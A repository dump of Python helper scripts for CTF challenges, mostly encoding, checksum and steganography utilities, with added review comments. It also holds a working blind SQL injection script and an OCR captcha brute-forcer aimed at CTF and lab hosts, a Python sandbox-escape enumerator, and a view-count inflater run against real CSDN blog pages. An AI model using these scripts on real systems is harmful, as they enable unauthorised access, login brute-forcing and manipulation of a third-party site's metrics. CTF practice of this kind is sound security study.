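├── 00.README.md
├── 01.字符串转换成二维码.py
├── 02.base64隐写.py
├── 03.Base家族加密解密.py
├── 04.CRC32碰撞.py
├── 05.MD5.py
├── 06.post快速反弹.py
├── 07.rot13.py
├── 08.test.py
├── 09.遍历找os模块.py
├── 10.词频统计.py
├── 11.根据CRC爆破宽高.py
├── 12.进制及ascii转换.py
├── 13.九键密码解密.py
├── 14.盲注判断密码.py
├── 15.伪随机数.py
├── 16.压缩包解密.py
├── 17.验证码识别.py
├── rot13.py
└── test.png


/00.README.md:
--------------------------------------------------------------------------------
# CTF-python-script
CTF常用python脚本


--------------------------------------------------------------------------------
/01.字符串转换成二维码.py:
--------------------------------------------------------------------------------
# Render a string of '0'/'1' characters as a square black-and-white image
# (typically a QR code hidden in a challenge as a bit string).
from PIL import Image

MAX = 25  # width and height: the string holds 625 '0'/'1' characters, so 25 x 25
pic = Image.new("RGB", (MAX, MAX))
# If the input is a list of (255,255,255)/(0,0,0) pixels, convert it to a 0/1 string first.
# Named `bits` rather than `str` so the builtin str() is not shadowed.
bits = "1111111000100001101111111100000101110010110100000110111010100000000010111011011101001000000001011101101110101110110100101110110000010101011011010000011111111010101010101111111000000001011101110000000011010011000001010011101101111010101001000011100000000000101000000001001001101000100111001111011100111100001110111110001100101000110011100001010100011010001111010110000010100010110000011011101100100001110011100100001011111110100000000110101001000111101111111011100001101011011100000100001100110001111010111010001101001111100001011101011000111010011100101110100100111011011000110000010110001101000110001111111011010110111011011"

# Fail with a clear message instead of an IndexError half-way through the image.
if len(bits) < MAX * MAX:
    raise ValueError("need %d bits for a %dx%d image, got %d" % (MAX * MAX, MAX, MAX, len(bits)))

for i in range(MAX * MAX):
    # Row-major order: the bit at index i belongs to column i % MAX of row i // MAX.
    y, x = divmod(i, MAX)
    if bits[i] == '1':
        pic.putpixel((x, y), (0, 0, 0))
    else:
        pic.putpixel((x, y), (255, 255, 255))

pic.show()
pic.save("./flag.png")


--------------------------------------------------------------------------------
/02.base64隐写.py:
--------------------------------------------------------------------------------
#coding=UTF-8
# Run under Python 2. Useful when a file holds many base64 lines and decoding
# them yields nothing useful: the data is then carried in the bits that base64
# padding leaves unused, which is what this script recovers.
# NOTE(review): indentation was lost in this copy of the file; the nesting below
# is the most plausible reading - compare with the upstream file.

def get_base64_diff_value(s1, s2):
    """Return the alphabet distance at the first position where s1 and s2 differ.

    Returns 0 when no position in range(len(s1)) differs. Raises ValueError if a
    differing character is not in the standard base64 alphabet, and IndexError if
    s2 is shorter than s1.
    """
    base64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
    for i in xrange(len(s1)):
        if s1[i] != s2[i]:
            return abs(base64chars.index(s1[i]) - base64chars.index(s2[i]))
    return 0

def solve_stego():
    """Read ./test.txt and print the bytes hidden in the base64 padding bits."""
    with open('./test.txt', 'rb') as f:
        file_lines = f.readlines()

    bin_str = ''
    for line in file_lines:
        steg_line = line.replace('\n', '')
        # Decoding and re-encoding yields the canonical form of the line; any
        # difference from the stored line is the hidden payload. The same
        # round-trip comparison is how this kind of stego is detected.
        norm_line = line.replace('\n', '').decode('base64').encode('base64').replace('\n', '')
        diff = get_base64_diff_value(steg_line, norm_line)

        # Each '=' of padding leaves two unused bits in the last symbol.
        pads_num = steg_line.count('=')
        if diff:
            #print bin(diff)
            bin_str += bin(diff)[2:].zfill(pads_num * 2)
        else:
            bin_str += '0' * pads_num * 2

    res_str = ''
    for i in xrange(0, len(bin_str), 8):
        res_str += chr(int(bin_str[i:i+8], 2))
    print res_str

solve_stego()


--------------------------------------------------------------------------------
/03.Base家族加密解密.py:
--------------------------------------------------------------------------------
import base36
import base58
import base62
import base64
import base91
import py3base92  # base92 is not Python 3 compatible; this is a project from GitHub


def encode(txt):
    """Print txt (bytes) encoded with every supported base-N codec.

    base36 only accepts input that parses as an integer; every other codec is
    called directly and will raise if it rejects the input.
    """
    print("[+]input is ", end="")
    print(txt)

    print("==============================================================================")
    #base16
    print("[成功]base16 encode: ", end="")
    print(base64.b16encode(txt))

    #base32
    print("[成功]base32 encode: ", end="")
    print(base64.b32encode(txt))

    #base36
    try:
        base36_m_str = bytes.decode(txt)
        base36_m_int = int(base36_m_str)

        base36_cipher = base36.dumps(base36_m_int)
        print("[成功]base36 encode: ", end="")
        print(base36_cipher)
    except Exception as e:
        print("[失败]base36 encode: ", end="")
        print("base36加密只支持整数数字")

    #base58
    print("[成功]base58 encode: ", end="")
    print(base58.b58encode(txt))

    #base62
    print("[成功]base62 encode: ", end="")
    print(base62.encodebytes(txt))

    #base64
    print("[成功]base64 encode: ", end="")
    print(base64.b64encode(txt))

    #base85
    print("[成功]base85 encode: ", end="")
    print(base64.b85encode(txt))

    #base91
    print("[成功]base91 encode: ", end="")
    print(base91.encode(txt))

    #base92
    print("[成功]base92 encode: ", end="")
    print(py3base92.encode(txt))


def decode(txt):
    """Try every supported base-N codec on txt (bytes) and print each outcome.

    A "success" line only means the codec accepted the input, not that the
    guess is right: base64.b64decode, for example, silently discards characters
    outside its alphabet unless validate=True is passed.
    """
    print("[+]input is ", end="")
    print(txt)
    print("==============================================================================")

    #base16
    try:
        base16_decode = base64.b16decode(txt)
        print("[成功]base16 decode: ", end="")
        print(base16_decode)
        print()
    except Exception as e:
        print("[失败]base16 decode: ", end="")
        print(e)

    #base32
    try:
        base32_decode = base64.b32decode(txt)
        print("[成功]base32 decode: ", end="")
        print(base32_decode)
        print()
    except Exception as e:
        print("[失败]base32 decode: ", end="")
        print(e)

    #base36
    try:
        base36_decode = base36.loads(txt)
        print("[成功]base36 decode: ", end="")
        print(base36_decode)
        print()
    except Exception as e:
        print("[失败]base36 decode: ", end="")
        print(e)

    #base58
    try:
        base58_decode = base58.b58decode(txt)
        print("[成功]base58 decode: ", end="")
        print(base58_decode)
        print()
    except Exception as e:
        print("[失败]base58 decode: ", end="")
        print(e)

    #base62
    try:
        base62_c_string = bytes.decode(txt)
        base62_decode = base62.decodebytes(base62_c_string)
        print("[成功]base62 decode: ", end="")
        print(base62_decode)
        print()
    except Exception as e:
        print("[失败]base62 decode: ", end="")
        print(e)

    #base64
    try:
        base64_decode = base64.b64decode(txt)
        print("[成功]base64 decode: ", end="")
        print(base64_decode)
        print()
    except Exception as e:
        print("[失败]base64 decode: ", end="")
        print(e)

    #base85, b85 alphabet: this is the variant encode() emits via b85encode,
    # so it has to be tried here for an encode/decode round trip to work.
    try:
        base85_b_decode = base64.b85decode(txt)
        print("[成功]base85(b85) decode: ", end="")
        print(base85_b_decode)
        print()
    except Exception as e:
        print("[失败]base85(b85) decode: ", end="")
        print(e)

    #base85, Ascii85 alphabet (a different encoding from b85)
    try:
        base85_decode = base64.a85decode(txt).decode()
        print("[成功]base85 decode: ", end="")
        print(base85_decode)
        print()
    except Exception as e:
        print("[失败]base85 decode: ", end="")
        print(e)

    #base91
    try:
        base91_decode = base91.decode(str(txt, encoding="utf-8")).decode()
        print("[成功]base91 decode: ", end="")
        print(base91_decode)
        print()
    except Exception as e:
        print("[失败]base91 decode: ", end="")
        print(e)

    #base92
    try:
        base92_decode = py3base92.decode(str(txt, encoding="utf-8"))
        print("[成功]base92 decode: ", end="")
        print(base92_decode)
        print()
    except Exception as e:
        print("[-]base92 decode: ", end="")
        print(e)


if __name__ == '__main__':
    print("Welcome to base series encode and decode")
    txt = input("Please input your string ::: ")

    txt = str.encode(txt)
    flag = input("Please input encode(1) or decode(回车) ::: ")

    if(flag == "1"):
        encode(txt)
    else:
        decode(txt)


--------------------------------------------------------------------------------
/04.CRC32碰撞.py:
--------------------------------------------------------------------------------
# Python 2 script (print statement, crc32 over a str).
# Recovers a 5-character plaintext from its CRC32 by exhaustive search. CRC32 is
# an error-detection code, not a cryptographic hash: the checksum stored for a
# very short file is enough to recover the file's content.
import binascii
import itertools

dic = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&*()_+- ={}[]"
crc = 0x3DACAC6B
# product() walks the candidates in the same order as five nested loops over dic.
for chars in itertools.product(dic, repeat=5):
    s = ''.join(chars)
    # Mask to 32 bits: Python 2's crc32 can return a negative number.
    if crc == (binascii.crc32(s) & 0xffffffff):
        print s


--------------------------------------------------------------------------------
/05.MD5.py: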
--------------------------------------------------------------------------------
# MD5 hashing helper
import hashlib


def MD5(str):
    """Return the hex MD5 digest of the UTF-8 encoding of the given text."""
    return hashlib.md5(str.encode(encoding='utf-8')).hexdigest()


# NOTE(review): a and b look like percent-encoded byte strings that differ in a
# few bytes. MD5() below hashes the percent-encoded text itself, not the bytes
# it stands for - confirm that is the intent. MD5 is not collision resistant and
# must not be used where two inputs have to be told apart reliably.
a="1%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%93%D0w%C9Ur%C1%89y+u%EB%A3c%28%D4Z%CF%E8%0E%F1%B9%5D%D4%FBy%7C%5D%8F%B2A%C6%02%AC%C0%09X%E6%5C%EC%E79b%824fko%00%06%2C%1F%03%8F%AD%91%BD%92%18%C2%B8%8C0%A7u9.%CA_%922%C3%15%3BN%E4%F45%3DD%A6t%60E%5B%CA%02N%1E%5Drw%CC%7C%7D%CEU%107%F8%BC%B37%E7%8EW%C9i%9B%3C%F6%FD%CA%A0%E6Du%C4%A3%25%B7%DD%E1a8c%05f"
b="1%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%93%D0w%C9Ur%C1%89y+u%EB%A3c%28%D4Z%CF%E8%8E%F1%B9%5D%D4%FBy%7C%5D%8F%B2A%C6%02%AC%C0%09X%E6%5C%EC%E79b%824%E6ko%00%06%2C%1F%03%8F%AD%91%BD%92%18B%B8%8C0%A7u9.%CA_%922%C3%15%3BN%E4%F45%3DD%A6t%60%C5%5B%CA%02N%1E%5Drw%CC%7C%7D%CEU%107%F8%BC%B37%E7%8EW%C9i%9B%BC%F5%FD%CA%A0%E6Du%C4%A3%25%B7%DD%E1%E18c%05f"

print(MD5(a))
print(MD5(b))
#215962017 if ($md5==md5($md5))
# for i in range(999999999999):
#     y=True
#     a=MD5("0e"+str(i))
#     b=a[2:]
#     if(a[:2]=="0e"):
#         for x in b:
#             if(ord(x)>=97 and ord(x)<=102):
#                 y=False
#                 continue
#         if(y):
#             print(i)
#             break


# print(MD5("abd"))
# for i in range(9999999,9999999999):
#     if(MD5(str(i))[:6]=="5ca419"):
#         print(i)
#         break


--------------------------------------------------------------------------------
/06.post快速反弹.py:
--------------------------------------------------------------------------------
# Fetch a challenge page and POST the answer back straight away.
import requests
import re
import random
import string
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# NOTE(review): this silences the warning urllib3 raises for unverified TLS.
# No request in this file passes verify=False, so the suppression only hides
# the problem if certificate checks are switched off later.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# NOTE(review): the HTML tags inside the regex lookarounds below are missing
# from this copy of the file; restore them from the upstream source.
# url = 'https://ordinal-scale.hgame.n3ko.co/game.php'  # target link
# s = requests.Session()  # create a session object
# html = s.get(url).text  # GET request; html holds the page content
# expression = re.compile(r'(?<=).*(?=\=)').findall(html)  # pull the expression to compute out of html; the lookbehind names the tag it starts after
# NOTE(review): eval() on text returned by a remote server runs whatever that
# server sends on the solver's machine; use a restricted arithmetic evaluator.
# payload = {'value': eval(expression[0])}  # evaluate the expression (findall returns a list, hence [0]) and build the POST data
# flag = s.post(url, data=payload)  # POST with parameters
# flag.encoding = 'utf-8'  # decode as utf-8
# print(flag.text)


url = 'http://ha1cyon-ctf.fun:30197/login.php'

# NOTE(review): `payload` is only assigned in the commented-out example above,
# so this line raises NameError as the file stands.
flag = requests.post(url, data=payload)
flag.encoding = 'utf-8'
# expression = re.compile(r'(?<=).*(?=)').findall(html)
print(flag.text)


'''
#配合php代码
phpText = requests.get('http://127.0.0.1:88/php%e8%84%9a%e6%9c%ac/rand.php')

#设置cookie、referer等
header = {"Cookie":"PHPSESSID=294a9b966570ae34347a613e894d3271","Referer":"http://lab1.xseclab.com/pentest6_210deacdf09c9fe184d16c8f7288164f/index.php"}
flag = s.post(url, data=payload,headers=header)

'''


--------------------------------------------------------------------------------
/07.rot13.py:
--------------------------------------------------------------------------------
# Import the required library
import string


def rot13(text):
    """Apply ROT13 to text; the same call both encodes and decodes.

    Args:
        text (str): the text to transform.

    Returns:
        str: text with every ASCII letter rotated by 13 places; all other
        characters are left unchanged.
    """
    upper = string.ascii_uppercase
    lower = string.ascii_lowercase
    # Upper- and lower-case letters are rotated within their own alphabets.
    table = str.maketrans(
        upper + lower,
        upper[13:] + upper[:13] + lower[13:] + lower[:13]
    )
    return text.translate(table)


# Read the user's input
input_text = input("请输入要进行 ROT13 转换的文本: ")

# Transform it and print the result
encoded_text = rot13(input_text)
print("转换后的文本为:", encoded_text)


--------------------------------------------------------------------------------
/08.test.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# CSDN visitor-count inflater
# Author: 夏日
# Two modes: a given list of urls, or every article of a blog
# github: https://github.com/zss192/CTF-python-script/blob/master/csdn%E5%88%B7%E8%AE%BF%E5%AE%A2.py
#
# NOTE(review): this automates page views against a third-party site. The
# requests differ only in User-Agent and Referer, so a view counter that
# de-duplicates by client address or account over a time window is unaffected
# by the header rotation.
# NOTE(review): indentation was lost in this copy of the file; the placement of
# time.sleep() in main() and sumShua() follows the parameter descriptions.

import re
import requests
import time
import random


user_agent_list=[
    'Mozilla/5.0(compatible;MSIE9.0;WindowsNT6.1;Trident/5.0)',
    'Mozilla/4.0(compatible;MSIE8.0;WindowsNT6.0;Trident/4.0)',
    'Mozilla/4.0(compatible;MSIE7.0;WindowsNT6.0)',
    'Opera/9.80(WindowsNT6.1;U;en)Presto/2.8.131Version/11.11',
    'Mozilla/5.0(WindowsNT6.1;rv:2.0.1)Gecko/20100101Firefox/4.0.1',
    'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER',
    'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)',
    'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 SE 2.X MetaSr 1.0',
    'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.3.4000 Chrome/30.0.1599.101 Safari/537.36',
    'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 UBrowser/4.0.3214.0 Safari/537.36'
]
referer_list=[
    'https://blog.csdn.net/zss192/article/details/104144885',
    'http://blog.csdn.net/',
    'https://blog.csdn.net/zss192',
    'https://blog.csdn.net/zss192/article/details/104144006'
]


def shua(url):
    """Fetch url once with a random User-Agent/Referer and print title and view count."""
    header = {}
    header['User-Agent'] = random.choice(user_agent_list)
    header['Referer'] = random.choice(referer_list)
    s = requests.Session()  # create a session object
    response = s.get(url, headers=header)
    html = response.text  # full text of the page
    # NOTE(review): the opening tags inside both lookbehinds are missing from
    # this copy of the file; restore them from the upstream source.
    title_pattern = re.compile(r'(?<=).*(?=<\/h1>)')
    views_pattern = re.compile(r'(?<=).*(?=<\/span>)')
    title = title_pattern.findall(html)
    views = views_pattern.findall(html)
    print("标题:"+str(title)+str(views))

###
# Visit the given articles
# times: number of passes over all the articles
# space: pause between passes (not too fast; 60 tested best)
# urls:  the urls to request, comma separated, any number of them
###
def main(times,space,*urls):
    """Request every url in urls, times passes in total, sleeping space seconds per pass."""
    for i in range(1,times+1):
        print(f"第{i}次请求 ")
        for url in urls:
            shua(url)
        time.sleep(space)

###
# Walk every article of a blog
# url:   https://blog.csdn.net/zss192
# times: number of passes over all the articles
# space: pause between articles (not too fast; a minute between passes is enough)
###
def sumShua(url,times,space):
    """Collect the article links found on the blog page at url and request each, times passes."""
    flag = requests.get(url)
    flag.encoding = 'utf-8'
    html=flag.text
    ls = re.findall(r""+url+"/article/details/\d*", html)
    ls = list(set(ls))  # drop duplicate links
    for i in range(1,times+1):
        print(f"第{i}次请求 ")
        for url in ls:
            shua(url)
            time.sleep(space)


#sumShua(url,times,space)
sumShua("https://blog.csdn.net/zss192",2,1)


#main(times,space,url...)
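# main(150,60,
#     "https://blog.csdn.net/zss192/article/details/105436623",
#     "https://blog.csdn.net/zss192/article/details/105393747",
#     "https://blog.csdn.net/zss192/article/details/105376347",
#     "https://blog.csdn.net/zss192/article/details/105362282",
#     )


--------------------------------------------------------------------------------
/09.遍历找os模块.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# encoding: utf-8
# Python 2 script. Lists, by index, the subclasses of object whose __init__
# carries 'os' in its globals. It shows why a sandbox or template engine that
# only removes builtins is not a boundary: attribute access to dunder names
# (__class__, __subclasses__, __globals__) has to be blocked as well.

cnt=0
for item in [].__class__.__base__.__subclasses__():
    try:
        if 'os' in item.__init__.__globals__:
            print cnt,item
        cnt+=1
    except:
        # Classes whose __init__ has no __globals__ (C-level slots) land here.
        print "error",cnt,item
        cnt+=1
        continue


--------------------------------------------------------------------------------
/10.词频统计.py:
--------------------------------------------------------------------------------
# Character frequency count of out.txt, printed in ascending order of count.
from collections import Counter

# `with` closes the file even if reading fails.
with open("out.txt",'r') as f:
    a=f.read()

# One pass over the text; calling a.count(x) per character re-scans the whole
# text every time and is quadratic on large inputs.
d3=Counter(a)

# Counter keeps first-occurrence order and sorted() is stable, so characters
# with equal counts stay in the order they first appear.
list1= sorted(d3.items(),key=lambda x:x[1])
print(list1)


--------------------------------------------------------------------------------
/11.根据CRC爆破宽高.py:
--------------------------------------------------------------------------------
## Brute-forces a PNG's width and height from the header CRC so the values can
## be corrected and the image displays normally.
## With a wrong width/height the image fails to open on Linux but opens on Windows.
# NOTE(review): indentation was lost in this copy of the file; the CRC check is
# placed after both fields are written, which is the only reading that compares
# a complete candidate.
import zlib
import struct

filename = 'test.png'
with open(filename, 'rb') as f:
    all_b = f.read()

# Bytes 29..32 hold the stored CRC; bytes 12..28 are the data it covers, with
# the width at offset 4 and the height at offset 8 of that slice.
crc32key = int(all_b[29:33].hex(),16)
data = bytearray(all_b[12:29])
n = 4095  # in theory 0xffffffff, but given real screen sizes / CPU cost 0x0fff is about enough
for w in range(n):  # width and height are searched together
    width = bytearray(struct.pack('>i', w))  # q is 8 bytes, i is 4 bytes, h is 2 bytes
    for h in range(n):
        height = bytearray(struct.pack('>i', h))
        data[4:8] = width
        data[8:12] = height
        crc32result = zlib.crc32(data)
        if crc32result == crc32key:
            print("宽为:",end="")
            print(width)
            print("高为:",end="")
            print(height)
            exit(0)


--------------------------------------------------------------------------------
/12.进制及ascii转换.py:
--------------------------------------------------------------------------------
import base64
import re


def shiZhuanAscii(ls):  # list of decimal values -> ASCII string
    """Return the string whose characters have the code points listed in ls."""
    return ''.join(chr(int(i)) for i in ls)


def erZhuanShi(ls):  # list of binary strings -> list of decimal ints
    """Convert every binary string in ls to an int, in place, and return ls."""
    for idx, bits in enumerate(ls):
        ls[idx] = int(bits, 2)
    return ls


def splitS(s,n):  # split s into list items of n characters each
    """Return consecutive n-character chunks of s; a shorter trailing chunk is dropped."""
    return re.findall('.{'+str(n)+'}', s)


# Example:
# NOTE(review): the sample values in the trailing comments come from a
# different input than the string s below.

s="011100100110000101110010001011010111000001100001011100110111001101110111011001000011101000110000011000010110001100110001011001100110010100110110011000100011011100110111011000100110010100110101011001000110001001100101"
ls=splitS(s,8)  #['1100110', '1101100', '1100001', '1100111', '1111011', '1010111', '0110000', '1010111', '0101010', '1100110', '1110101', '1101110', '1101110', '1111001', '1111101']
ls=erZhuanShi(ls)  #[102, 108, 97, 103, 123, 87, 48, 87, 42, 102, 117, 110, 110, 121, 125]
ls=shiZhuanAscii(ls)  #flag{W0W*funny}
print(ls)

# s="52 14 51 44 14 55 41 43 53 14 42 52 15 42 14 55 53 13 15 43 53 13 21 42 45 54 22 12 33"
# ls=s.split(" ")
# print(shiZhuanAscii(ls))


--------------------------------------------------------------------------------
/13.九键密码解密.py:
--------------------------------------------------------------------------------
# Phone-keypad (multi-tap) cipher decoding

chiper='999*666*88*2*777*33*6*999*4*444*777*555*333*777*444*33*66*3*7777'
chiper=chiper.split('*')  # groups are separated by '*'

keys=['1','2','3','4','5','6','7','8','9']  # a challenge may use q for 1, w for 2 and so on; edit this line in that case
values=[1,2,3,4,5,6,7,8,9]
dicts=dict(zip(keys,values))

jiugongge=[' ','abc','def','ghi','jkl','mno','pqrs','tuv','wxyz']
new_dicts=dict(zip(values,jiugongge))

for group in chiper:
    temp=dicts.get(group[0])  # temp=9,6,8,2....
    # Look up the letters of the key (9 -> wxyz), then pick the letter at index
    # len-1, i.e. by how many times the key is repeated.
    print(''.join(new_dicts[temp][len(group)-1]),end='')


--------------------------------------------------------------------------------
/14.盲注判断密码.py:
--------------------------------------------------------------------------------
# Boolean-based blind SQL injection against a CTF login form: each request asks
# whether the ASCII value of one password character exceeds a number, and the
# answer is read from whether the page contains "P3".
# NOTE(review): this only works because the server concatenates the submitted
# fields into the SQL text; parameterized queries remove the injection. A run
# of near-identical logins that differ by one integer is the detection signal.
import time
import requests

url="http://fed28533-eed0-4dbc-8446-36d87747cd17.node3.buuoj.cn/index.php"
result=[]
for k in range(1,20):
    for i in range(65,126):
        payload={"username":"\\","password":'or (ascii(substr(password,'+str(k)+',1))>'+str(i)+')#'}
        # {'username': '\\', 'password': 'or (ascii(substr(password,1,1))>65)#'}  loop over the ASCII value of the n-th password character
        req=requests.post(url=url,data=payload)
        time.sleep(0.5)
        if("P3" in req.text):  # the page contains P3 when the condition holds
            print(chr(i))
            result.append(chr(i))
            print(result)
            break  # first character found, move on to the next one
print(result,end="")


--------------------------------------------------------------------------------
/15.伪随机数.py:
--------------------------------------------------------------------------------
# For PHP code that calls mt_srand(seed) and then mt_rand(<range>): turns known
# output characters into the argument list the php_mt_seed tool expects.
# NOTE(review): mt_rand is not a cryptographic generator; values derived from it
# can be traced back to the seed. PHP code that needs unpredictable tokens
# should use random_bytes() or random_int().

str1='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
str2='KVQP0LdJKRaV3n9D'
str3 = str1[::-1]
length = len(str2)
res=''
for i in range(len(str2)):
    for j in range(len(str1)):
        if str2[i] == str1[j]:
            # One "min max range_low range_high" group per observed character.
            res+=str(j)+' '+str(j)+' '+'0'+' '+str(len(str1)-1)+' '
            break
print(res)

# Run ./php_mt_seed on Kali with the printed res as its arguments
# eg: ./php_mt_seed 18 18 0 61 15 15 0 61 50 50 0 61 10 10 0 61 43 43 0 61 13 13 0 61 27 27 0 61 52 52 0 61 5 5 0 61 61 61 0 61



# if(!isset($_SESSION['seed'])){
# $_SESSION['seed']=rand(0,999999999);
# }

# mt_srand($_SESSION['seed']);
# $str_long1 = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
# $str='';
# $len1=20;
# for ( $i = 0; $i < $len1; $i++ ){
# $str.=substr($str_long1, mt_rand(0, strlen($str_long1) - 1), 1);
# }
# $str_show = substr($str, 0, 10);
# NOTE(review): the HTML tags inside the echo string are missing from this copy.
# echo "".$str_show."";


--------------------------------------------------------------------------------
/16.压缩包解密.py:
--------------------------------------------------------------------------------
# Unpacks a chain of nested zip archives in which each archive's password is its
# own four-character base name.
# NOTE(review): extractall() writes whatever the archive contains into the
# current directory, and nested archives can expand far beyond their size on
# disk; run this in an empty scratch directory with a disk quota.
import zipfile
import os

name = '0653'
tmp=""  # the archive that was just unpacked
# Stop cleanly when the chain ends instead of failing on a missing file.
while os.path.exists(name + '.zip'):
    tmp=name+".zip"
    # Close the archive before deleting it: removing a file that is still open
    # fails on Windows.
    with zipfile.ZipFile(tmp, 'r') as fz:  # open the archive
        fz.extractall(pwd=bytes(name, 'utf-8'))  # decrypt and extract
        members = fz.filelist
    os.remove(tmp)
    if not members:
        break  # empty archive: nothing to continue with
    name = members[0].filename[0:4]  # base name of the file inside the archive


--------------------------------------------------------------------------------
/17.验证码识别.py:
--------------------------------------------------------------------------------
# This code fails when run from Sublime; run it from IDLE instead.
# Pkav HTTP Fuzzer is the recommended tool for brute-forcing captchas.
#
# Enumerates the three-digit mobi_code of a training-lab login, reading the
# image captcha with OCR on every attempt.
# NOTE(review): the loop works because the server allows an unlimited number of
# guesses per session; attempt limits per session and number, a longer code,
# and a captcha that cannot be read by OCR are the controls being tested.

import requests  # library for url and cookie handling
import sys
import time
from pytesseract import *
from PIL import Image


def vcode(pic_url,cookies):
    """Download the captcha at pic_url and return its OCR text once it is four digits.

    Retries by calling itself until OCR yields exactly four digits, so a captcha
    that never reads cleanly ends in RecursionError.
    """
    r = requests.get(pic_url, cookies=cookies, timeout=10)
    with open('vcode.png', 'wb') as pic:
        pic.write(r.content)
    image=Image.open('vcode.png')
    im = image_to_string(image)
    #print im
    im = im.replace(' ', '')
    if im.isdigit() and len(im)==4:
        return im
    return vcode(pic_url,cookies)


cookies = {'PHPSESSID':'c460c2f1424af9e7b503c90e3d54c9e4'}
payload = {'username': '13388886666', 'mobi_code': '100','user_code':'5053','Login':'submit'}

picurl='http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/vcode.php'  # captcha image address

url="http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/login.php"  # login request address


for i in range(100,999):
    code1=vcode(picurl,cookies)
    payload['user_code']=code1  # captcha text
    payload['mobi_code']=i
    wp = requests.post(url, data=payload,cookies=cookies, timeout=10)
    text=wp.content
    responsetxt = text.decode()  # response body as text

    if 'error' not in responsetxt:
        print('The correct code is:', code1,responsetxt)
        break
    else:
        print('tring code:', i, code1,responsetxt)

print("get flag success")


--------------------------------------------------------------------------------
/rot13.py:
--------------------------------------------------------------------------------
# Import the required library
import string


def rot13(text):
    """Apply ROT13 to text; the same call both encodes and decodes.

    Args:
        text (str): the text to transform.

    Returns:
        str: text with every ASCII letter rotated by 13 places; all other
        characters are left unchanged.
    """
    upper = string.ascii_uppercase
    lower = string.ascii_lowercase
    # Upper- and lower-case letters are rotated within their own alphabets.
    table = str.maketrans(
        upper + lower,
        upper[13:] + upper[:13] + lower[13:] + lower[:13]
    )
    return text.translate(table)


# Read the user's input
input_text = input("请输入要进行 ROT13 转换的文本: ")

# Transform it and print the result
encoded_text = rot13(input_text)
print("转换后的文本为:", encoded_text)


--------------------------------------------------------------------------------
/test.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zss192/CTF-python-script/3418af354f45e323c00a725c69262a137e22664b/test.png


--------------------------------------------------------------------------------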